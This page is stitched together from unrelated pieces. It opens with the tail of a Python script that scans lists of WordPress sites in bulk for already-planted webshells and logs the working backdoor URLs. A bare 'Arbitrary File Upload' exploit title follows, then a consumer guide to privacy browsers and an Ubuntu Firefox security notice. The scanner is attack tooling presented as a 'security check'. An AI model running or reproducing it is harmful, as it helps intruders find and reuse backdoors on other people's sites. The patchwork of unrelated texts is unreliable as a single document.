+'/wp-content/themes/travelscape/json.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/themes/aahana/json.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'MSQ_403' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/aahana/json.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))        check = requests.get(url + '/wp-content/themes/travel/issue.php',headers=headers, allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url +'/wp-content/themes/travel/issue.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url + '/about.php', headers=headers,allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/about.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/digital-download/new.php', headers=headers,allow_redirects=True, timeout=15)        if '#0x2525' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('digital-download.txt', 'a').write(url +'/wp-content/themes/digital-download/new.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'http://' + URLdomain(url)        check = requests.get(url + '/epinyins.php', headers=headers,allow_redirects=True, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/epinyins.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'https://' + URLdomain(url)        check = requests.get(url + '/wp-admin/dropdown.php',headers=headers, allow_redirects=True, verify=False, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'Simple Shell' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('dummyyummy.txt', 'a').write(url +'/wp-content/plugins/dummyyummy/wp-signup.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))    except Exception as e:        print(f' -| {url} --> {fr}[Failed] due to: {e}')def main():    try:        url_file_path = sys.argv[1]    except IndexError:        url_file_path = input(f"{info_color}Enter the path to the filecontaining URLs: ")        if not os.path.isfile(url_file_path):            print(f"{error_color}[ERROR] The specified file path isinvalid.")            sys.exit(1)    try:        urls_to_check = [line.strip() for line in open(url_file_path, 'r',encoding='utf-8').readlines()]    except Exception as e:        print(f"{error_color}[ERROR] An error occurred while reading thefile: {e}")        sys.exit(1)    pool = ThreadPool(20)    pool.map(check_security, urls_to_check)    pool.close()    pool.join()    print(f"{info_color}Security check process completed successfully.Results are saved in corresponding files.")if __name__ == "__main__":    main()

WordPress Travelscape Theme 1.0.3 Arbitrary File Upload

Ad trackers are out of control. Use a browser that reins them in.

Google's admission that, yes, it does track you while you're in Chrome's Incognito mode, is just the latest in a long line of unsettling revelations about just how keenly Big Tech keeps an eye on our movements every time we connect to the internet. Billions of data records will now be deleted as part of a settlement to a class action lawsuit brought against Google.

As we've written before, Incognito mode and the equivalent modes offered by other browsers aren't as secure as you might think, particularly if you start signing into accounts like Google or Facebook. Your activities and searches as a logged-in user on large platforms can still be recorded, primarily to create advertising that's more accurately targeted toward your demographic.

Google, for its part, says it’s transparent about what data it’s storing and why—and in recent years it has made it easier for users to see and delete the information held about them. To really lock down your privacy and security, though, it’s best to switch to a browser not made by a company that earns billions of dollars selling ads.

And there are alternatives: Below we recommend several browsers built with user privacy and security as a priority. Even better, in many cases they can import data such as bookmarks and passwords from your current browser—Google Chrome, for example.

**DuckDuckGo (Android, iOS, Windows, macOS)**

The DuckDuckGo browser blocks trackers at their source.

DuckDuckGo via David Nield

You might know DuckDuckGo as the anti-Google search engine, but the parent company has branched out to make its own browsers too. They keep you well protected online and at the same time give you plenty of information about the tracking technologies being proactively blocked.

DuckDuckGo starts by enforcing encrypted HTTPS connections when websites offer them, and gives each page you visit a grade based on how aggressively it's trying to mine your data. It'll even scan and rank site privacy policies for you.

When it comes to browsing data, this can be cleared automatically at the end of each session or after a certain period of time. Pop-ups and ads are snuffed out, and of course the DuckDuckGo search engine is built in, free of the Google trappings.

You also get extras like throwaway email aliases you can use in place of your real email address to protect your privacy, and everything about the browser and its features is simple to use: You don't really need to do anything except install them, so you're getting maximum protection with minimal effort.

**Ghostery (Android, iOS, Windows, macOS)**

Ghostery comes with a range of tools to protect your privacy.

Ghostery via David Nield

Install Ghostery on your mobile device or your computer, and straight away it gets to work blocking adverts and tracking cookies that will attempt to keep tabs on what you're up to on the web. There are no complicated setup screens or configurations to manage.

Like DuckDuckGo, Ghostery tells you exactly which trackers and ads it's blocking and how many monitoring tools each website has installed. If you do come across certain sites that are well behaved, you can mark them as trusted with a tap.

Or, if you find a site that's packed full of tracking systems, you can block every single bit of cookie technology on it (for commenting systems, media players, and so on), even if the site ends up breaking. A simple, private search engine is built in to replace Google too.

Ghostery's tools are a little more in-depth and advanced than the ones offered by DuckDuckGo, so you might consider it if you want to take extra control over which trackers are blocked on which sites—but it's simple enough for anyone to use.

**Tor Browser (Android, Windows, macOS)**

Tor connects you to the Tor network, to keep your online activities more private.

Tor via David Nield

Tor Browser markets itself as a browsing option "without tracking, surveillance, or censorship." It is worth a look if you want the ultimate in anonymized, tracker-free browsing—unless you're on iOS, where it isn't available (Tor recommends the Onion Browser instead).

The browser is part of a bigger project to keep internet browsing anonymous: Use Tor and you use the Tor Project network, a complex, encrypted relay system managed by the Tor community, making it much harder for anyone else to follow your activities online.

As well as this additional layer of anonymity, Tor Browser is super-strict on the background scripts and tracking tech that sites can run. It also blocks fingerprinting, a method where advertisers attempt to recognize the unique characteristics of your device.

At the end of each browsing session, everything gets wiped, including cookies left behind by sites and the browsing history inside the Tor Browser app itself. In other words, private browsing that leaves no trace is the default—and indeed the only option.

**Brave (Android, iOS, Windows, macOS)**

Brave gives you a clean, speedy browsing experience.

Brave via David Nield

Brave comes with all the tracking protection features you would expect: Ads are completely blocked, there are tight restrictions on the data that sites can gather through cookies and tracking scripts, and you're always kept informed about what's happening.

The browser comes with an optional built-in VPN, though it costs extra ($10 a month). You can also, if you want, use Brave to access the Tor network we mentioned with the Tor browser and take advantage of its anonymizing relay service that hides your location and browsing data.

There's no doubt about the effectiveness of Brave's tracker-blocking technologies, and getting around the web in Brave is quick and snappy. It's a comprehensive package and one that strikes a well-judged balance between simplicity and power for the majority of users.

Brave has regularly pioneered features related to innovative web technologies, including cryptocurrencies, NFTs, and (most recently) artificial intelligence; there's actually a new AI assistant built into it. In other words, it's not exclusively focused on security and privacy.

**Firefox (Android, iOS, Windows, macOS)**

Firefox is part of a suite of privacy products from Mozilla.

Firefox via David Nield

Firefox has long been at the forefront of online privacy—blocking tracking cookies across sites by default, for example—and it continues to be one of the best options for making sure you're giving away as little data as possible as you make your way across the web.

Firefox also gives you a ton of information on each website you visit regarding the trackers and cookies that pages have attempted to leave, and which ones Firefox has blocked. Permissions for access to your location and microphone can be easily managed as well.

Aside from looking after the interests of its users, Firefox also scores highly for user customization. You can change the look and behavior of the browser in a variety of ways, and there are useful integrations like the built-in Pocket utility that saves web stories on your device so you can read them later.

Firefox developer Mozilla offers plenty of extras, including a free data-breach monitor that tells you when your usernames and passwords may have been exposed somewhere online, a free email alias system to keep your actual email address protected, and a VPN that costs $10 per month. It all adds up to a comprehensive package for keeping you safe online.

**Safari (iOS, macOS)**

Safari has been blocking tracking cookies for some time.

Safari via David Nield

Apple continues to add privacy tech to Safari with each release on iOS and macOS—like requiring user authentication (such as a Face ID scan) when returning to a browsing session—though it's obviously not a browsing option if you're on Android or Windows.

Safari has long been blocking third-party tracking cookies that try to connect the dots on your web activity across multiple sites. It also blocks device fingerprinting techniques that try to identify your devices, and it reports back on the trackers it has disabled.

The browser can now also warn you when you try to use a password that's too weak on a new website or service, and it will make a suggestion of a stronger password if needed. Recent browser updates added support for logging in with passkeys too.

Safari operates against the backdrop of Apple's commitment to collect as little information about you as possible and to keep most of that information locked away locally on your device rather than on Apple's servers.

_Update: April 6, 2024, 8:30 am: This guide was updated to include new guidance for DuckDuckGo and Ghostery, as well as to bring some descriptions of browser providers' data collection policies up to date._

Best Privacy Browsers (2024): Brave, Safari, Ghostery, Firefox, DuckDuckGo

Ubuntu Security Notice 6710-2 - USN-6710-1 fixed vulnerabilities in Firefox. The update introduced several minor regressions. This update fixes the problem. Manfred Paul discovered that Firefox did not properly perform bounds checking during range analysis, leading to an out-of-bounds write vulnerability. A attacker could use this to cause a denial of service, or execute arbitrary code. Manfred Paul discovered that Firefox incorrectly handled MessageManager listeners under certain circumstances. An attacker who was able to inject an event handler into a privileged object may have been able to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6710-2  
April 04, 2024

firefox regressions  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

USN-6710-1 caused some minor regressions in Firefox.

Software Description:  
- firefox: Mozilla Open Source web browser

Details:

USN-6710-1 fixed vulnerabilities in Firefox. The update introduced  
several minor regressions. This update fixes the problem.

Original advisory details:

  Manfred Paul discovered that Firefox did not properly perform bounds  
  checking during range analysis, leading to an out-of-bounds write  
  vulnerability. A attacker could use this to cause a denial of service,  
  or execute arbitrary code. (CVE-2024-29943)

    Manfred Paul discovered that Firefox incorrectly handled MessageManager  
  listeners under certain circumstances. An attacker who was able to inject  
  an event handler into a privileged object may have been able to execute  
  arbitrary code. (CVE-2024-29944)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   firefox                         124.0.2+build1-0ubuntu0.20.04.1

After a standard system update you need to restart Firefox to make all the  
necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6710-2  
   https://ubuntu.com/security/notices/USN-6710-1  
   https://launchpad.net/bugs/2060171

Package Information:  
   https://launchpad.net/ubuntu/+source/firefox/124.0.2+build1-0ubuntu0.20.04.1

Tag

#firefox